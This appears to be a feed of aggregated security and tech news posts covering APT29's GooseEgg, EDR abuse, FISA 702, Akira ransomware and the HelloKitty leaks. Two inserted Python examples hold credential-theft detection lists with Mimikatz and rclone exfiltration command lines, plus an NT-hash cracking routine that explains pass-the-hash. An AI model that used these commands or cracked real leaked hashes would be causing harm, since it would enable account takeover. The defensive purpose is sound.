The implications of such attacks go beyond simple financial loss. They can compromise long-standing business relationships, damage reputations and cause significant disruption to the supply chain. That is why it is essential not only to detect these attacks but to actively prevent them. “Man in the Middle” and “Adversary in the Middle” attacks with indirect proxy are significant threats that exploit both human and technological vulnerabilities to compromise sensitive data and divert funds. These attacks, which evade both traditional and advanced security measures such as multi-factor authentication, require a coordinated response combining cutting-edge technology, rigorous security policies and an ongoing commitment to user training. Only through vigilance, constant innovation in defensive techniques and collaboration between organizations can we hope to mitigate the risk of these sophisticated cyber threats, thereby protecting financial integrity and customers’ trust in financial institutions.

The article Threats in the digital age: an analysis of ‘Man in the Middle’ and ‘Adversary in the Middle’ attacks first appeared on il blog della sicurezza informatica.




The APT29 group hits Windows with backdoor malware via the Print Spooler
https://poliverso.org/display/0477a01e-0964d44f-de36cb29fd343226

In recent years, security professionals have observed an increase in cyberattacks against organizations in Eastern and Western Europe, as well as in North America. This is due to the hackers of the APT29 group, who actively exploit vulnerabilities in security systems.

Microsoft researchers have identified the group’s use of a new type of malware called GooseEgg, which exploits a bug in the Windows Print Spooler component that was officially patched in October 2022.

The vulnerability, known as CVE-2022-38028, has a CVSS score of 7.8 and allows elevated privileges on the system. Using the GooseEgg malware, the attackers launch programs with elevated rights, which makes it easier for them to spread further malware and install backdoors.

According to experts, APT29’s activity often focuses on intelligence gathering. GooseEgg, although a simple launcher application, supports various commands to trigger vulnerabilities and execute malicious code.

The group has also recently been seen exploiting vulnerabilities in Microsoft Outlook and WinRAR for privilege escalation and code execution, highlighting its ability to quickly integrate public exploits into its operations.

To protect against APT29 attacks, Microsoft recommends eliminating the Print Spooler vulnerability if this has not already been done since the patch was released, and actively strengthening protection mechanisms within the organization.

The article The APT29 group hits Windows with backdoor malware via the Print Spooler first appeared on il blog della sicurezza informatica.




Reverse Engineering the Quansheng Hardware
https://poliverso.org/display/0477a01e-105a6ce2-573cc165df0f1ec9

In the world of cheap amateur radio transceivers, the Quansheng UV-K5 can’t be beaten for hackability. But pretty much every hack we’ve seen so far focuses on the firmware. What about the hardware?

To answer that question, [mentalDetector] enlisted the help of a few compatriots and vivisected a UV-K5 to find out what makes it tick. The result is a (nearly) complete hardware description of the radio, including schematics, PCB design files, and 3D renders. The radio was a malfunctioning unit that was donated by collaborator [Manuel], who desoldered all the components and measured which ones he could to determine specific values. The parts that resisted his investigations got bundled up along with the stripped PCB to [mentalDetector], who used a NanoVNA to characterize them as well as possible. Documentation was up to collaborator [Ludwich], who also made tweaks to the schematic as it developed.

PCB reverse engineering was pretty intense. The front and back of the PCB — rev 1.4, for those playing along at home — were carefully photographed before getting the sandpaper treatment to reveal the inner two layers. The result was a series of high-resolution photos that were aligned to show which traces connected to which components or vias, which led to the finished schematics.

There are still a few unknown components, mostly capacitors by the look of it, but the bulk of the work has been done, and hats off to the team for that. This should make hardware hacks on the radio much easier, and we’re looking forward to what’ll come from this effort. If you want to check out some of the firmware exploits that have already been accomplished on this radio, check out the Trojan Pong upgrade, or the possibilities of band expansion. We’ve also seen a mixed hardware-firmware upgrade that really shines.




How EDR solutions can be weaponized by hackers
https://poliverso.org/display/0477a01e-8c68747c-13199c0d1879e647

SafeBreach specialist Shmuel Cohen has shown that EDR solutions can be used as attack tools. In his study, Cohen analyzed one of the EDR systems, identifying vulnerabilities that could allow hackers to use the tool for malicious purposes.

EDR systems run with elevated privileges and are designed to protect devices from a variety of threats, including malware. However, compromising such systems can give attackers persistent and undetectable access to victims’ devices.

Cohen discovered that the behaviour of the EDR under investigation allowed him to bypass its file-modification protection, enabling him to run ransomware encryption software and even load a vulnerable driver to prevent the EDR from being removed with an administrator password.

In addition, the researcher found a way to inject malicious code into one of the EDR processes, allowing the code to run with elevated privileges without being detected. Cohen also exploited the ability to modify Lua and Python files, making it possible to execute malicious code and gain access to the machine with the highest system privileges.

Using a vulnerable driver, Cohen was able to read from and write to the system kernel, allowing him to modify the EDR’s control-password checks so that any password was accepted, or even to block uninstallation of the program when it was disconnected from its control server.

The study highlights that attacks on EDR solutions can give attackers powerful capabilities that are likely to go undetected. Cohen notes that security products must carefully protect the logic of their detection processes and must encrypt and digitally sign their content files to prevent tampering. Processes should also be added to allow or deny lists on the basis of several parameters that an attacker should not be able to modify.

Palo Alto Networks responded to Cohen’s discovery by updating its security mechanisms and advising users to make sure their systems are up to date. Cohen shared his research publicly to raise awareness of such threats and to strengthen security measures in organizations.

The article How EDR solutions can be weaponized by hackers first appeared on il blog della sicurezza informatica.




FISA Amendments Act Section 702: the United States will keep monitoring the world!
https://poliverso.org/display/0477a01e-965d5d8b-3043ed6357a61077

After a bitter debate that lasted into the early hours of Saturday morning, the US Congress voted to extend Section 702 of the Foreign Intelligence Surveillance Act (FISA) for two years.

This program allows US intelligence agencies to intercept the communications data of foreigners abroad without a warrant, even when they are dealing with US citizens.

The Senate approved the extension by a margin of 60 votes in favour to 34 against.

Democratic majority leader Chuck Schumer called the move necessary for national security. Last week the House of Representatives also voted in favour, despite former president Donald Trump’s appeal on social media to “bury” the bill.

The law, first passed in 2008 and expanded several times since, allows the National Security Agency (NSA) to obtain data on foreign individuals abroad for intelligence purposes from US technology companies without a warrant. About 3% of this information is passed on to the FBI.

Naturally, the main criticism of the 702 program is that Americans’ messages can be caught up in the interceptions. That is why civil liberties advocates from both parties have for years been calling for tighter regulation.

In the House of Representatives, in a dramatic 212-212 vote, an amendment that would have required a court order to access citizens’ data collected under the 702 program was rejected. A similar proposal by Senator Dick Durbin failed by a narrow margin. Five other, less ambitious amendments were subsequently rejected.

Intelligence officials have long pushed for the law to be extended, arguing that its expiry would put many lives at risk. The program helped thwart a terrorist attack on a critical infrastructure site last year and uncover a Chinese cyberattack on a US transport hub, FBI Director Christopher Wray said.

Interestingly, in 2022 the court that oversees the intelligence agencies identified more than 278,000 cases in which the FBI violated the terms of the law between 2020 and early 2021. Among other things, the Bureau had requested data on a congressman’s donors, on participants in the 6 January assault on the Capitol and on protesters against the killing of George Floyd. However, there was no reason to believe this information was related to intelligence activities.

The FBI has now tightened its procedures. Analysts must independently justify the relevance of their queries, and lawyers must approve bulk searches of large groups of people. However, the new version of the text has broadened the range of companies required to cooperate with the authorities. It now applies not only to telecommunications companies but also to “any other service provider” with access to equipment for transmitting and storing communications data, i.e. cloud storage.

Privacy advocates have harshly criticized the move, calling it an “Orwellian measure” that would allow the government to monitor citizens’ private communications.

However, one of the amendment’s authors, Representative Jim Himes, insists that it has a narrowly technical focus and will not affect ordinary people. Still, the debate over the balance between national security and privacy rights is likely to continue.

The article FISA Amendments Act Section 702: the United States will keep monitoring the world! first appeared on il blog della sicurezza informatica.




Far-sighted: the “extraordinary men” who were guests of the Red Hot Cyber Conference 2024
https://poliverso.org/display/0477a01e-a790a080-8852e8bde33bddae

It is 22:48 on 21 April 2024, more than 24 hours have passed since the end of the Red Hot Cyber Conference in Rome, and as I drive home after a beautiful day spent with my family, I think about what I can tell you. I think I should start by telling you that on Sunday I was able to interview some fantastic people, and that I cannot wait for you to hear them too.

The first thing I will tell you about them is the deep passion they put into the work that keeps them engaged in defending our country; you can read it in their eyes. Not only that: in their answers you will see their great gift of foresight, which is needed to anticipate the unexpected and plan how to manage it so as to prevent the inevitable. How I love my country. I understand it when I listen to them, when they explain to me that Italians around the world hold positions of very great responsibility, and not only around the world but here too, today and now.

As I think about all this, two high beams blind me from the rear-view mirror. I am on a ring road, I am keeping to the 70 km/h speed limit and the centre line is solid. The car behind is a little less than two metres from me; then, after a few kilometres, it plucks up courage and overtakes me. I sigh, but whoever is coming from the opposite direction has had the same idea. And it occurs to me that security policies are only as strong as their weakest link. Human behaviour is indeed the most sensitive factor, and even today it is not entirely predictable.

Of course, if we could have all the information about its nature and about the motivations behind behaviour, we would probably be able to predict it more accurately, but then, naturally, other important questions would arise, such as: if a behaviour were predictable, could it also be manipulated? Then we would get to the ethical questions, for example whether someone is or is not truly responsible for their own actions.

The fact remains that controlling our behaviour in respect of the rules and of other people’s safety is fundamental. This does not only apply on the road but also on our computers. Security is a great responsibility, for everyone, in every field of life, and above all it is a team effort and not a solo battle. Red Hot Cyber has always known this and has always put it into practice internally.

Above all, it was put into practice by the young people who tested themselves in the Capture The Flag (CTF) on Saturday: to succeed, the teams must work together to identify and exploit the system’s vulnerabilities, and to do this they may need to use a variety of skills and techniques, such as network analysis, reverse engineering or cryptography. They must also communicate and coordinate well among themselves and defend their own systems from any attacks. Above all, even before everything begins, they must read the rules and try not to break them.

On the shoulders of giants you see further


Here is a great quality of the personalities interviewed: foresight and the capacity for strategic vision. They are all people who, to get where they are today, took on great responsibilities and who put heart, hands and head into what they do. Among them I mention: Antonio Capobianco, CEO of FATA Informatica; Mario Nobile, Director General of the Agency for Digital Italy (Agid); Umberto Rosini, Director of Information Systems at the Presidency of the Council of Ministers – Civil Protection Department; Marco Molinaro, Security lead at Accenture for Italy, Central Europe and Greece, and Martino Bevacqua, Senior Manager at Accenture Security; Gianluca Tirozzi, co-founder of BitCorp; the magnificent Paolo Galdieri, criminal lawyer admitted to the Court of Cassation and lecturer in IT criminal law; David Cenciotti, former reserve officer of the Italian Air Force and journalist, founder of “The Aviationist”, one of the most authoritative aviation sites in the world; the legendary Corrado Giustozzi, cyber security strategist, strategic consultant, lecturer and popularizer; and Filippo Bonativicola, Security manager.

With them we ranged from digital governance to logistics systems, from cybercrime to geospatial data and intelligence for planning military operations; we talked about mistakes and challenges, but also about opportunities, quantum computers and drones in flight, the Middle East and Italy, above all our Italy, its young people and future scenarios. And then we asked some of them: who really is the hacker?

The answers will surprise you, as they surprised me, and soon you will be able to hear them speak when the video interviews are shared. I do not want to spoil the surprise. So I will tell you what I learned in the two days of the conference and on the ring road.

Reality is never to be interpreted through the lens of the self


Reality is never to be interpreted through the lens of the self: intelligence teaches this, using the scientific method to select the useful “information” and then take the important decisions relating to each individual national interest.

The ego must never prevail, because it pushes us to focus on ourselves instead of on a common goal, and because it creates the “intellectual bullying” highlighted by Christian Espinosa, cybersecurity engineer and author of “The Smartest Person in the Room”, as the reason we might lose the war in cybersecurity.

That is why my story on the ring road was meant to have a point. I could let my ego govern me, or I could set it aside and try to act as safely as possible, trying not to interpret that moment as a personal offence or to become arrogant like those people who are convinced they never err in judging someone else’s behaviour.

Because behind that rule-breaking behaviour there could have been a father anxious about a child, or someone whose day had not gone as hoped. It is true, exceeding certain limits often means putting others and ourselves at risk, and the rules must be respected, but taking ourselves out of the centre, especially in the field of cybersecurity, makes activities safer. This can also be applied to the virtual world, to social media for example, and to our relationship with our own subjectivity.

On the other hand, we have before us the choice to be a little more aware of the world around us, of the fact that every action we take has direct consequences for the network of people close to us, their data, their security, their reputation. Especially when I write about geopolitics in relation to the cyber world, I must always keep firmly in mind that “when I feel certain of something, it most often turns out to be mathematically wrong” and that discussion with others can never be missing.

Foresight and 404


In this world, where error has always existed and always will, and where it has often led to discovery and growth, we must realize that technology brings us enormous advantages but also every sort of problem. We have programmed a machine of which we know all the pieces and “we understand all the parts, but we are using it in ways decidedly different from its intended use” (Danny Hillis, The Internet Could Crash). And it is true, we often use it superficially, we are a little behind, but the important thing is not to throw ourselves from great heights without a parachute or a method for managing uncertainty.

And how do we get out of it? Always listen to those who really know more than you, as when you were children and began a heap of questions with “why?”. Ask deep, intelligent and honest questions, look for consistency and consider the alternative answers. It is really simple according to Richard Feynman: “To try to solve the problem, I think the best thing is to gather around you a table of experts, people who know something about it, and study together what has been done in the past. It will take time, but then we will arrive at a reasonable solution.” And this is what Red Hot Cyber tried to do during the conference.

By the way, also find the time to read “The Meaning of It All” by Richard Feynman, “Telephone Tales” by Gianni Rodari and “This Is Water” by David Foster Wallace, and do not forget science fiction, because some great writers were already telling us in the 1950s about the threats we are living through today. Oh! And do not forget to read Red Hot Cyber!

The article Far-sighted: the “extraordinary men” who were guests of the Red Hot Cyber Conference 2024 first appeared on il blog della sicurezza informatica.




Akira: a ransomware in pole position! 250 organizations hit and 42 million dollars in ransoms
https://poliverso.org/display/0477a01e-270d42a1-67f5131e7d0922a8

Since the start of 2023, the Akira ransomware has compromised the networks of more than 250 organizations and collected about 42 million dollars in ransoms, according to a joint statement by the FBI, CISA, Europol’s European Cybercrime Centre (EC3) and the National Cyber Security Centre of the Netherlands (NCSC-NL).

The Akira ransomware emerged in March 2023 and quickly gained notoriety, attacking victims in various sectors around the world. By June 2023 the malware’s developers had created a Linux ransomware for VMware ESXi virtual machines, which are widely used in enterprise environments.

According to experts, Akira’s operators demand on average a ransom ranging from 200,000 to several million dollars, depending on the size of the hacked organization. As law enforcement now reports, as of 1 January 2024 the group had attacked 250 organizations in North America, Europe and Australia and had demanded about 42 million dollars in ransoms from its victims.

For example, in December 2023 Akira’s representatives claimed an attack on Nissan’s systems in Australia and New Zealand, and the company subsequently confirmed a data leak affecting 100,000 people. Akira also recently breached Stanford University, which last month had warned of a data breach affecting the personal information of 27,000 people.

In totale, dalla sua nascita nel 2023, il gruppo ha segnalato attacchi contro più di 230 organizzazioni sul suo sito web nella underground. Le forze dell’ordine hanno incluso gli indicatori di compromissione (IoC) di Akira nel loro rapporto, nonché informazioni sulle tattiche e sui metodi utilizzati dal gruppo che sono stati identificati durante le indagini dell’FBI a partire dal febbraio 2024.

Pertanto, è stato riferito che per l’accesso iniziale alle reti prese di mira, gli operatori del malware prendono di mira i servizi VPN privi di autenticazione a più fattori, utilizzando principalmente vulnerabilità note nei prodotti Cisco (come CVE-2020-3259 e CVE-2023-20269). Inoltre, gli hacker utilizzano spesso il Remote Desktop Protocol (RDP), lo spear phishing e credenziali valide per accedere agli ambienti delle vittime.

Per aumentare i privilegi, gli aggressori utilizzano soluzioni come Mimikatz e LaZagne, mentre Windows RDP viene utilizzato principalmente per gli spostamenti laterali all’interno della rete della vittima. L’esfiltrazione dei dati viene effettuata utilizzando FileZilla, WinRAR, WinSCP e RClone.
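The tradecraft listed above maps onto log sources most teams already collect: VPN authentication logs, Windows logon events and process-creation telemetry. The following added example (mine, not from the advisory or the original article) runs a small triage over constructed records of those three kinds; the field names, the tool list and the record shapes are assumptions. It tags each stage the advisory names and then raises only hosts that show both credential theft and an exfiltration tool, because WinRAR or WinSCP on its own is ordinary activity.

```python
"""Flag Akira-style tradecraft across constructed endpoint, logon and VPN records.

Added example, not part of the original post or the joint advisory: the record
layout and the per-stage tool lists are assumptions for this demonstration.
"""
import ntpath
from collections import defaultdict

# Tools the advisory ties to each stage, matched case-insensitively on the image basename.
STAGE_TOOLS = {
    "credential_access": ("mimikatz", "lazagne"),
    "exfiltration": ("rclone", "winscp", "filezilla", "winrar"),
}
# Mimikatz module prefixes: still catch the tool when the binary has been renamed.
MIMIKATZ_MODULES = ("sekurlsa::", "lsadump::")


def classify(rec):
    """Return (stage, detail) for one record, or None when it matches nothing."""
    kind = rec.get("type")
    if kind == "vpn" and rec.get("result") == "success" and not rec.get("mfa", False):
        return "initial_access", f"VPN logon by {rec['user']} from {rec['src']} without MFA"
    if kind == "logon" and rec.get("logon_type") == 10:  # RemoteInteractive: an RDP session
        return "lateral_movement", f"RDP logon by {rec['user']} from {rec['src']}"
    if kind == "process":
        image = ntpath.basename(rec.get("image", "")).lower()
        cmd = rec.get("cmdline", "").lower()
        for stage, tools in STAGE_TOOLS.items():
            if any(tool in image for tool in tools):
                return stage, f"{image}: {cmd}"
        if any(mod in cmd for mod in MIMIKATZ_MODULES):
            return "credential_access", f"{image}: {cmd}"
    return None


def triage(records):
    """Classify every record, then raise hosts showing both credential theft and exfil."""
    findings = []
    stages_by_host = defaultdict(set)
    for rec in records:
        hit = classify(rec)
        if hit is None:
            continue
        stage, detail = hit
        findings.append({"host": rec["host"], "stage": stage, "detail": detail})
        stages_by_host[rec["host"]].add(stage)
    # One archiver or rclone run is noisy on its own; the stage combination is the signal.
    chains = sorted(host for host, stages in stages_by_host.items()
                    if {"credential_access", "exfiltration"} <= stages)
    return {"findings": findings, "chains": chains}


SAMPLE_RECORDS = [  # constructed for this example
    {"type": "vpn", "host": "VPN-GW", "user": "jdoe", "src": "203.0.113.7",
     "result": "success", "mfa": False},
    {"type": "vpn", "host": "VPN-GW", "user": "asmith", "src": "198.51.100.4",
     "result": "success", "mfa": True},
    {"type": "logon", "host": "FS01", "user": "jdoe", "src": "10.0.0.5", "logon_type": 10},
    {"type": "process", "host": "FS01", "image": r"C:\Temp\mk.exe",
     "cmdline": "mk.exe privilege::debug sekurlsa::logonpasswords"},
    {"type": "process", "host": "FS01", "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r"WinRAR.exe a -r finance.rar D:\Finance"},
    {"type": "process", "host": "FS01", "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
     "cmdline": "rclone.exe copy D:\\staging remote:exfil"},
    {"type": "process", "host": "WS07", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS)["findings"]:
        print(finding)
    print("hosts with a credential-theft + exfiltration chain:", triage(SAMPLE_RECORDS)["chains"])
```

The individual hits are deliberately broad (archivers and file-transfer clients have legitimate uses), so the `chains` list is the output worth paging on; note that the renamed Mimikatz binary in the sample is still caught through its `sekurlsa::` module name on the command line, which is why command-line logging matters more than image names here.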

This article originally appeared on Red Hot Cyber, il blog della sicurezza informatica.

Dual-Wavelength SLA 3D Printing: Fast Continuous Printing With ROMP And RFP Resins
https://poliverso.org/display/0477a01e-62f4a760-a4c8b9d9866091a4

As widespread as 3D printing with stereolithography (SLA) is in the consumer market, these additive manufacturing (AM) machines are limited to a single UV light source and to the polymerization of free-radical polymerization (FRP) resins. The effect is that the object is printed in layers, with each layer adhering not only to the previous layer but also to the transparent (FEP or similar) film at the bottom of the resin vat. Peeling each layer off the film not only forces a pause in the printing process but also puts significant stress on the part being printed. Over the years a few solutions have been developed, with Sandia National Laboratories' SWOMP technology (PR version) being among the latest.

Unlike the more common FRP-based SLA resins, SWOMP (Selective Dual-Wavelength Olefin Metathesis 3D-Printing) uses ring-opening metathesis polymerization (ROMP), a process that has been commercialized since the 1970s but had not previously been used with photopolymerization in this fashion. Dicyclopentadiene (DCPD) was chosen as the monomer, with HeatMet (HM) as the photo-active olefin metathesis catalyst. This provides the UV sensitivity, and an added photobase generator (PBG) can be used to selectively deactivate polymerization.

General overview of SWOMP chemistry using HM as the catalyst and DCPD as the monomer. (Credit: Jeffrey C. Foster et al., Advanced Science, 2022, Sandia National Laboratories)

The advantage of DCPD is that this material and the resulting objects are highly robust, and they are commonly thermally post-cured (250 °C for 30 seconds for the dogbones in this experiment) to reach their full mechanical properties. Meanwhile the same dual-wavelength setup is used for continuous SLA printing, as previously covered by e.g. [Martin P. de Beers] and colleagues in a 2019 paper in Science Advances. Not only does the photoinhibitor in FRP and ROMP resins prevent polymerized resin from attaching to the transparent film or window; because the photoinhibition depth is controlled locally, dual-wavelength SLA is not limited to single layers and can print entire topological features in a single pass.

This method might therefore improve on both existing FRP-based single-wavelength SLA and Carbon's proprietary CLIP technology with its oxygen-permeable membrane, with no peeling and print speeds many times those of conventional SLA. Currently Sandia is looking for partners to develop and commercialize this technology, raising the hope that dual-wavelength SLA printers may reach the market from manufacturers which do not require a security clearance and/or proof of financial liquidity before you even get to talk to a salesperson.

HelloKitty rebrands as HelloGookie! CD Projekt Red passwords and Cisco data revealed!
https://poliverso.org/display/0477a01e-d55b79f8-3c8de3a264ff31f6

The authors of the HelloKitty ransomware have announced a rename to HelloGookie and have published CD Projekt Red passwords and Cisco data that had previously leaked online, along with decryption keys for old attacks.

The attacker behind the announcement is known as Gookee and kapuchin0 and claims to be the creator of the HelloKitty malware.

Recall that HelloKitty ransomware appeared in 2020 and actively attacked corporate networks, stealing data and encrypting systems. The group's first high-profile attack came in February 2021, when the hackers breached CD Projekt Red, the maker of Cyberpunk 2077, The Witcher 3 and Gwent, encrypting the company's servers and stealing source code. HelloKitty's representatives later claimed to have sold the stolen material on underground forums.

In 2022 another ransomware group, Yanluowang, was itself hacked. Its leaked internal chat logs suggested that Yanluowang might be closely tied to the HelloKitty developer, who used the handle Guki in those conversations.

Last autumn the HelloKitty source code was published on a Russian-language hacking forum. The presumed author of the malware, posting as kapuchin0, said at the time that he was developing a new, more powerful encryptor and no longer needed HelloKitty.

As security researcher 3xp0rt now writes, the recent "rebranding" of the ransomware as HelloGookie was marked by the launch of a new Data Leak Site (DLS) on the darknet.

To celebrate the launch, the ransomware operators published four private decryption keys for older HelloKitty versions on the new site, which can be used to decrypt files hit in past attacks.

They also released internal information stolen from Cisco during the 2022 attack, as well as passwords for the Gwent, Witcher 3 and Red Engine source code stolen from CD Projekt Red.

Bleeping Computer reports that a member of the group that compiled Witcher 3 from the leaked sources, known by the handle sventek, said the leak amounts to 450 GB of data and contains the source code of Witcher 3, Gwent and Cyberpunk, various console SDKs (PS4/PS5, Xbox, Nintendo) and some build logs.

In particular, the dump contains binaries that allow developers to run a build of Witcher 3.
Screenshot of a Witcher 3 build made from the leaked source code
As for the data stolen from Cisco, the leak contains a list of NTLM (NT LAN Manager) hashes allegedly extracted during the compromise of the company's systems. In 2022 Cisco admitted it had been attacked by the Yanluowang group; it subsequently stated that the incident was limited to the theft of minor data from a single account.
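A leaked NT hash list is more than a list of usernames: an NT hash is unsalted MD4 over the UTF-16LE password, so every entry can be checked against candidate passwords offline at very high speed, and wherever NTLM authentication is still accepted the hash itself can be replayed (pass-the-hash) without being cracked at all. The following added example, not part of the original article and not built on the leaked data, parses a constructed pwdump-style list and performs the first triage a defender would do on such a leak: find accounts with an empty password, accounts that share a hash, and accounts whose hash matches a small candidate list. MD4 is implemented inline because many OpenSSL 3 builds disable it in hashlib; the sample dump, its usernames and the candidate list are constructed.

```python
"""Triage a pwdump-style NT hash list (constructed sample, not the leaked data).

Added example: NT hashes are unsalted MD4(UTF-16LE(password)), so a leaked list
can be checked offline against candidate passwords and, where NTLM auth is still
allowed, replayed directly (pass-the-hash).
"""
import struct
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, inlined because many OpenSSL 3 builds drop it from hashlib."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"            # padding: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, word order, shift amounts)
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in rounds:
            for i, w in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[w] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c        # rotate roles so each step updates the next word
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """The NT hash Windows stores: MD4 of the password encoded as UTF-16LE, no salt."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text: str):
    """Yield (user, nt_hash) from 'user:rid:lmhash:nthash:::' lines; skip comments."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and not line.startswith("#"):
            yield parts[0], parts[3].lower()


def triage(dump: str, candidates):
    """Report empty-password accounts, accounts sharing a hash, and candidate-list hits."""
    lookup = {nt_hash(pw): pw for pw in candidates}  # hash each candidate once, then O(1) per account
    by_hash = defaultdict(list)
    report = {"empty": [], "cracked": {}, "shared": []}
    for user, nt in parse_pwdump(dump):
        by_hash[nt].append(user)
        if nt == EMPTY_NT:
            report["empty"].append(user)
        elif nt in lookup:
            report["cracked"][user] = lookup[nt]
    report["shared"] = [users for users in by_hash.values() if len(users) > 1]
    return report


SAMPLE_DUMP = """\
# constructed sample in pwdump format; the LM field is the empty-LM placeholder
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jsmith:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
kiosk:1107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
CANDIDATES = ["password", "Welcome1", "Summer2024"]  # constructed stand-in for a wordlist

if __name__ == "__main__":
    print(triage(SAMPLE_DUMP, CANDIDATES))
```

Two practical points follow from the code: the candidate hashes are computed once and looked up per account, which is exactly why an unsalted hash list scales so badly for the victim, and an account that is not "cracked" here is not safe, because its hash is still a usable credential until the password is rotated. The response to a leak like this is rotation of every listed account and disabling NTLM where possible, not just a cracking run.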

As journalists note, kapuchin0's access to this data points to closer cooperation between Yanluowang and HelloKitty than previously thought.

This article originally appeared on Red Hot Cyber, il blog della sicurezza informatica.

Optical Tweezers Investigate Tiny Particles
https://poliverso.org/display/0477a01e-0fa4ec87-55681f735bc81da1

No matter how small you make a pair of tweezers, there will always be things that tweezers aren’t great at handling. Among those are various fluids, and especially aerosolized droplets, which can’t be easily picked apart and examined by a blunt tool like tweezers. For that you’ll want to reach for a specialized tool like this laser-based tool which can illuminate and manipulate tiny droplets and other particles.

[Janis]'s optical tweezers use both a 170 milliwatt laser from a DVD burner and a second, more powerful half-watt blue laser. With these lasers a mist of fine particles, in this case glycerol, can be examined for particle size and other physical characteristics. First, he looks for a location in a test tube where the movement of the particles caused by convective heating (the chimney effect) is minimized. Once a favorable location is found, a specific particle can be trapped by the laser; it will then exhibit diffraction rings, a scattering of the laser light in a specific pattern that reveals more about the trapped particle.

Admittedly this is a niche tool that might not get a lot of attention outside of certain interests, but for those working with proteins, individual molecules, measuring and studying cells or, like this project, investigating colloidal particles, it can be indispensable. It's also interesting how one can be built largely from used optical drives, like this laser engraver that uses more than just the laser, or even this scanning laser microscope.

https://www.youtube.com/embed/G7LzygHHfaw?feature=oembed

NASA’s Voyager 1 Resumes Sending Engineering Updates to Earth
https://poliverso.org/display/0477a01e-63540cc8-9069a202bb0b5c4e

After many tense months, it seems that thanks to a gaggle of brilliant engineering talent and a lucky break the Voyager 1 spacecraft is once more back in action. Confirmation came on April 20th, when Voyager 1 transmitted its first usable data since it fell silent on November 14, 2023. As previously suspected, the issue was a defective memory chip in the flight data system (FDS), which among other things is responsible for packaging the data it receives from other subsystems before it is transmitted back to Earth. With Voyager 1 currently some 24 billion kilometers away, this made for a few tense days for those involved.

The firmware patch sent on April 18th contained an initial test to validate the theory, moving the code responsible for packaging the engineering data to a new location in FDS memory. If the theory was correct, the correct data should this time come back from Voyager. Two 22.5-hour-and-change one-way trips through deep space later, on April 20th, the team was ecstatic to see exactly what they had hoped for.

With this initial test successful, the team can now move the remaining code away from the faulty memory, after which regular science operations should resume, giving the plucky spacecraft a new lease on life at the still tender age of 46.

Ancient Cable Modem Reveals Its RF Secrets
https://poliverso.org/display/0477a01e-fea17d6d-4df995ccd416eefe

Most reverse engineering projects we see around here have some sort of practical endpoint in mind. Usually, but not always. Reverse-engineering a 40-year-old cable modem probably serves no practical end, except for the simple pleasure of understanding how 1980s tech worked.

You’ll be forgiven if the NABU Network, the source of the modem [Jared Boone] tears into, sounds unfamiliar; it only existed from 1982 to 1985 and primarily operated in Ottawa, Canada. It’s pretty interesting though, especially the Z80-based computer that was part of the package. The modem itself is a boxy affair bearing all the hallmarks of 1980s tech. [Jared]’s inspection revealed a power supply with a big transformer, a main logic board, and a mysterious shielded section with all the RF circuits, which is the focus of the video below.

Using a signal generator, a spectrum analyzer, and an oscilloscope, not to mention the PCB silkscreen and component markings, [Jared] built a block diagram of the circuit and determined the important frequencies for things like the local oscillator. He worked through the RF section, discovering what each compartment does, with the most interesting one probably being the quadrature demodulator. But things took a decidedly digital twist in the last compartment, where the modulated RF is turned into digital data with a couple of 7400-series chips, some comparators, and a crystal oscillator.

This tour of 80s tech and the methods [Jared] used to figure out what's going on in this box were pretty impressive. There's more to come on this project, including recreating the original signal with SDRs. In the meantime, if this put you in the mood for other videotext systems of the 80s, you might enjoy this Minitel terminal teardown.

https://www.youtube.com/embed/8IflOWH8fzY?feature=oembed

China’s Interim Measures for the Management of Generative AI Services: A Comparison Between the Final and Draft Versions of the Text
https://fpf.org/blog/chinas-interim-measures-for-the-management-of-generative-ai-services-a-comparison-between-the-final-and-draft-versions-of-the-text/
@privacy
Authors: Yirong Sun and Jingxian Zeng Edited by Josh Lee Kok Thong (FPF) and Sakshi Shivhare (FPF) The following is a guest post to the FPF blog by Yirong Sun, research fellow at the New York

AI + LEGO = A Brickton of Ideas
https://poliverso.org/display/0477a01e-bba43111-b01bfffea8f07630

What if there was some magic device that could scan all your LEGO and tell you what you can make with it? It's a childhood dream come true, right? Well, that device is in your pocket. Just dump out your LEGO stash on the carpet, spread it out so there's only one layer, scan it with your phone, and after a short wait you get a list of all the fun things you can make. With building instructions. And oh yeah, it shows you where each brick is in the pile.

